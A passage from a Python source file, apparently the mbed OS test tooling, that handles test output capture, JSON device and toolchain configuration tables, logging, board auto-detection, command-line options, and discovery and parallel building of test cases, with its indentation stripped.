# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print("Test::Output::Finish")
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.items():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print('Line %d:\t'%line_no + json_line)
if line_no == line:
print('%s\t%s^' (' ' * len('Line %d:' % line_no),
'-' * (column - 1)))
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print('JSON file %s parsing failed. Reason: %s' %
(json_spec_filename, json_error_msg))
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print()
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print('JSON file %s not opened. Reason: %s\n'%
(json_spec_filename, fileopen_error_msg))
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if isinstance(cell_val, list):
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if isinstance(test[col], list):
col_value = join_delim.join(test[col])
elif test[col] == None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = int(percent_progress / 2) # Scale by to (scale: 1 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print(single_test.generate_test_summary(test_summary, shuffle_seed))
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print(single_test.generate_test_summary_by_target(test_summary,
shuffle_seed))
print("Completed in %.2f sec" % elapsed_time)
print
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_text_file_name:
# Export results in form of a text file
report_exporter = ReportExporter(ResultExporterType.TEXT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_text_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
# Export build results as html report to sparate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print("Connecting to database '%s'..." % db_url)
db_.connect(host, username, password, db_name)
if db_.is_connected():
print("ok")
print("Detecting database...")
print(db_.detect_database(verbose=True))
print("Disconnecting...")
db_.disconnect()
print("done")
else:
print("Database type '%s' unknown" % db_type)
else:
print("Parse error: '%s' - DB Url error" % db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already imported module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
@param platform_name You can filter 'platform_name' with list of filtered targets from 'platform_name_filter'
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
# For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if its existing)
# if not we are creating our own unique value (last few chars from platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter:
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with test specification')
parser.add_argument('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_argument("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type=int,
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_argument('--auto',
dest='auto_detect',
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
toolchain_list = list(TOOLCHAINS) + ["DEFAULT", "ALL"]
parser.add_argument('--tc',
dest='toolchains_filter',
type=argparse_many(argparse_uppercase_type(toolchain_list, "toolchains")),
help="Toolchain filter for --auto argument. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_argument('--oper',
dest='operability_checks',
type=argparse_lowercase_type(get_available_oper_test_scopes(), "scopes"),
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_argument('--clean',
dest='clean',
action="store_true",
help='Clean the build directory')
parser.add_argument('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_argument("--profile", dest="profile", action="append",
type=argparse_filestring_type,
default=[])
parser.add_argument('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip perpherials tests and perform common tests')
parser.add_argument('-n', '--test-by-names',
dest='test_by_names',
type=argparse_many(str),
help='Runs only test enumerated it this switch. Use comma to separate test case names')
parser.add_argument('-p', '--peripheral-by-names',
dest='peripheral_by_names',
type=argparse_many(str),
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_argument('-c', '--copy-method',
dest='copy_method',
type=argparse_uppercase_type(copy_methods, "flash method"),
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_argument('-r', '--reset-type',
dest='mut_reset_type',
default=None,
type=argparse_uppercase_type(reset_methods, "reset method"),
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_argument('-g', '--goanna-for-tests',
dest='goanna_for_tests',
action="store_true",
help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
parser.add_argument('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
action="store_true",
help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
parser.add_argument('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of wellformatted table with test results')
parser.add_argument('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays wellformatted table with test x toolchain test result per target')
parser.add_argument('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_argument('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_argument("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_argument("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_argument('--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
help='Experimental, you execute test runners for connected to your host MUTs in parallel (speeds up test result collection)')
parser.add_argument('--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configration and exits')
parser.add_argument('--loops',
dest='test_loops_list',
type=argparse_many(str),
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_argument('--global-loops',
dest='test_global_loops_value',
type=int,
help='Set global number of test loops per test. Default value is set 1')
parser.add_argument('--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall argument. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_argument('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops arguments. Tests until OK result occurs and assumes test passed')
parser.add_argument('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts')
parser.add_argument('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_argument('--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_argument('-f', '--filter',
dest='general_filter_regex',
type=argparse_many(str),
default=None,
help='For some commands you can use filter to filter out results')
parser.add_argument('--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type=int,
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_argument('--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_argument('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_argument('--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_argument('--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_argument("--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_argument("--report-text",
dest="report_text_file_name",
help="Output the build results to a text file")
parser.add_argument('--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_argument('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_argument('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_argument('--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
parser.add_argument('--stats-depth',
dest='stats_depth',
default=2,
type=int,
help="Depth level for static memory report")
return parser
def test_path_to_name(path, base):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
This can eventually be overriden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(relpath(path,base))
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def get_test_config(config_name, target_name):
"""Finds the path to a test configuration file
config_name: path to a custom configuration file OR mbed OS interface "ethernet, wifi_odin, etc"
target_name: name of target to determing if mbed OS interface given is valid
returns path to config, will return None if no valid config is found
"""
# If they passed in a full path
if exists(config_name):
# This is a module config
return config_name
# Otherwise find the path to configuration file based on mbed OS interface
return TestConfig.get_config_path(config_name, target_name)
def find_tests(base_dir, target_name, toolchain_name, app_config=None):
""" Finds all tests in a directory recursively
base_dir: path to the directory to scan for tests (ex. 'path/to/project')
target_name: name of the target to use for scanning (ex. 'K64F')
toolchain_name: name of the toolchain to use for scanning (ex. 'GCC_ARM')
options: Compile options to pass to the toolchain (ex. ['debug-info'])
app_config - location of a chosen mbed_app.json file
returns a dictionary where keys are the test name, and the values are
lists of paths needed to biuld the test.
"""
# Temporary structure: tests referenced by (name, base, group, case) tuple
tests = {}
# List of common folders: (predicate function, path) tuple
commons = []
# Prepare the toolchain
toolchain = prepare_toolchain([base_dir], None, target_name, toolchain_name,
silent=True, app_config=app_config)
# Scan the directory for paths to probe for 'TESTS' folders
base_resources = scan_resources([base_dir], toolchain)
dirs = base_resources.inc_dirs
for directory in dirs:
subdirs = os.listdir(directory)
# If the directory contains a subdirectory called 'TESTS', scan it for test cases
if 'TESTS' in subdirs:
walk_base_dir = join(directory, 'TESTS')
test_resources = toolchain.scan_resources(walk_base_dir, base_path=base_dir)
# Loop through all subdirectories
for d in test_resources.inc_dirs:
# If the test case folder is not called 'host_tests' or 'COMMON' and it is
# located two folders down from the main 'TESTS' folder (ex. TESTS/testgroup/testcase)
# then add it to the tests
relative_path = relpath(d, walk_base_dir)
relative_path_parts = os.path.normpath(relative_path).split(os.sep)
if len(relative_path_parts) == 2:
test_group_directory_path, test_case_directory = os.path.split(d)
test_group_directory = os.path.basename(test_group_directory_path)
# Check to make sure discoverd folder is not in a host test directory or common directory
special_dirs = ['host_tests', 'COMMON']
if test_group_directory not in special_dirs and test_case_directory not in special_dirs:
test_name = test_path_to_name(d, base_dir)
tests[(test_name, walk_base_dir, test_group_directory, test_case_directory)] = [d]
# Also find any COMMON paths, we'll add these later once we find all the base tests
if 'COMMON' in relative_path_parts:
if relative_path_parts[0] != 'COMMON':
def predicate(base_pred, group_pred, (name, base, group, case)):
return base == base_pred and group == group_pred
commons.append((functools.partial(predicate, walk_base_dir, relative_path_parts[0]), d))
else:
def predicate(base_pred, (name, base, group, case)):
return base == base_pred
commons.append((functools.partial(predicate, walk_base_dir), d))
# Apply common directories
for pred, path in commons:
for test_identity, test_paths in tests.iteritems():
if pred(test_identity):
test_paths.append(path)
# Drop identity besides name
return {name: paths for (name, _, _, _), paths in tests.iteritems()}
def print_tests(tests, format="list", sort=True):
"""Given a dictionary of tests (as returned from "find_tests"), print them
in the specified format"""
if format == "list":
for test_name in sorted(tests.keys()):
test_path = tests[test_name][0]
print("Test Case:")
print(" Name: %s" % test_name)
print(" Path: %s" % test_path)
elif format == "json":
print(json.dumps({test_name: test_path[0] for test_name, test_paths
in tests}, indent=2))
else:
print("Unknown format '%s'" % format)
sys.exit(1)
def norm_relative_path(path, start):
"""This function will create a normalized, relative path. It mimics the
python os.path.relpath function, but also normalizes a Windows-syle path
that use backslashes to a Unix style path that uses forward slashes."""
path = os.path.normpath(path)
path = os.path.relpath(path, start)
path = path.replace("\\", "/")
return path
def build_test_worker(*args, **kwargs):
"""This is a worker function for the parallel building of tests. The `args`
and `kwargs` are passed directly to `build_project`. It returns a dictionary
with the following structure:
{
'result': `True` if no exceptions were thrown, `False` otherwise
'reason': Instance of exception that was thrown on failure
'bin_file': Path to the created binary if `build_project` was
successful. Not present otherwise
'kwargs': The keyword arguments that were passed to `build_project`.
This includes arguments that were modified (ex. report)
}
"""
bin_file = None
ret = {
'result': False,
'args': args,
'kwargs': kwargs
}
# Use parent TOOLCHAIN_PATHS variable
for key, value in kwargs['toolchain_paths'].items():
TOOLCHAIN_PATHS[key] = value
del kwargs['toolchain_paths']
try:
bin_file = build_project(*args, **kwargs)
ret['result'] = True
ret['bin_file'] = bin_file
ret['kwargs'] = kwargs
except NotSupportedException as e:
ret['reason'] = e
except ToolException as e:
ret['reason'] = e
except KeyboardInterrupt as e:
ret['reason'] = e
except:
# Print unhandled exceptions here
import traceback
traceback.print_exc(file=sys.stdout)
return ret
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
clean=False, notify=None, verbose=False, jobs=1, macros=None,
silent=False, report=None, properties=None,
continue_on_build_fail=False, app_config=None,
build_profile=None, stats_depth=None):
"""Given the data structure from 'find_tests' and the typical build parameters,
build all the tests
Returns a tuple of the build result (True or False) followed by the test
build data structure"""
execution_directory = "."
base_path = norm_relative_path(build_path, execution_directory)
target_name = target.name if isinstance(target, Target) else target
cfg, _, _ = get_config(base_source_paths, target_name, toolchain_name, app_config=app_config)
baud_rate = 9600
if 'platform.stdio-baud-rate' in cfg:
baud_rate = cfg['platform.stdio-baud-rate'].value
test_build = {
"platform": target_name,
"toolchain": toolchain_name,
"base_path": base_path,
"baud_rate": baud_rate,
"binary_type": "bootable",
"tests": {}
}
result = True
jobs_count = int(jobs if jobs else cpu_count())
p = Pool(processes=jobs_count)
results = []
for test_name, test_paths in tests.items():
if not isinstance(test_paths, list):
test_paths = [test_paths]
test_build_path = os.path.join(build_path, test_paths[0])
src_paths = base_source_paths + test_paths
bin_file = None
test_case_folder_name = os.path.basename(test_paths[0])
args = (src_paths, test_build_path, target, toolchain_name)
kwargs = {
'jobs': 1,
'clean': clean,
'macros': macros,
'name': test_case_folder_name,
'project_id': test_name,
'report': report,
'properties': properties,
'verbose': verbose,
'app_config': app_config,
'build_profile': build_profile,
'silent': True,
'toolchain_paths': TOOLCHAIN_PATHS,
'stats_depth': stats_depth
}
results.append(p.apply_async(build_test_worker, args, kwargs))
p.close()
result = True
itr = 0
while len(results):
itr += 1
if itr > 360000:
p.terminate()
p.join()
raise ToolException("Compile did not finish in 10 minutes")
else:
sleep(0.01)
pending = 0
for r in results:
if r.ready() is True:
try:
worker_result = r.get()
results.remove(r)
# Take report from the kwargs and merge it into existing report
if report:
report_entry = worker_result['kwargs']['report'][target_name][toolchain_name]
for test_key in report_entry.keys():
report[target_name][toolchain_name][test_key] = report_entry[test_key]
# Set the overall result to a failure if a build failure occurred
if ('reason' in worker_result and
not worker_result['reason'] and
not isinstance(worker_result['reason'], NotSupportedException)):
result = False
break
